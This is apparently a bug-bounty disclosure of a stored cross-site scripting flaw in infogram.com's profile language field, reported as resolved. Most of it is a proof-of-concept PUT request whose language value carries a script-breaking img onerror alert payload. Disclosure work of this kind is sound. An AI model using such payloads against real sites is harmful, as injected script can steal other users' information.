Stored XSS in infogram.com via language
Discovered by theappsec on Infogram

This issue took 0 Days and 12 hours to triage and 0 Days and 3 hours to resolve once triaged.



The stored XSS was found in the language profile parameter.

POC: Change profile settings with following request:

PUT /api/users/me HTTP/1.1
Host: infogram.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrf-token: **your token**
X-Requested-With: XMLHttpRequest
Content-Length: 135
DNT: 1
Connection: close
Cookie: **your cookies**

first_name=name&last_name=name&username=&confirm_password=password&language=></script><img src=x onerror=alert(document.domain)>;//

Go to your public profile link.

example: https://infogram.com/dd_ddt7

Impact

This allows an attacker to inject custom Javascript codes that can be used to steal information from infogram's users.